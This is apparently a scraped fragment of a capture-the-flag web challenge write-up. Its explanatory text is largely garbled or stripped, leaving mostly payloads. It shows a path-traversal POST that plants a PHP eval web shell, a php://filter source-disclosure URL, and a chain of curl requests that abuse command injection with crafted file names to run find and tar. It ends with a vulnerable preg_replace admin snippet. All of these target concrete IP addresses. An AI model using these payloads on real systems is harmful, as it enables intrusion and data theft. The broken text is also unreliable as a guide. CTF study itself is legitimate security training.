![](https://csdnimg.cn/release/download_crawler_static/86278507/bg4.jpg)
orangessrf
5waf.php,waf
tar5.1G orzzzzzzzz
0.0
http://47.104.156.32:20007/index.php?page=123&id=1a9
shell:
POST http://47.104.156.32:20007/index.php?page=123&id=1a9
DATA: file=../hh.php/.&con=<?php @eval($_POST[dlive]);?>
php
http://47.104.74.209:20005/index.php?page=php://filter/read=convert.base64-
encode/resource=index.php
# find />x xx
flag.phpweb
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>find
curl http://47.104.166.183:20008/getflag.php?dir=test&c=*%20/>x
curl http://47.104.166.183:20008/getflag.php?dir=test&re=1
#/varflag.php
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>tar
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>zcf
curl http://47.104.166.183:20008/getflag.php?dir=test&c=>zzz
curl http://47.104.166.183:20008/getflag.php?dir=test&c=*%20/v*
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();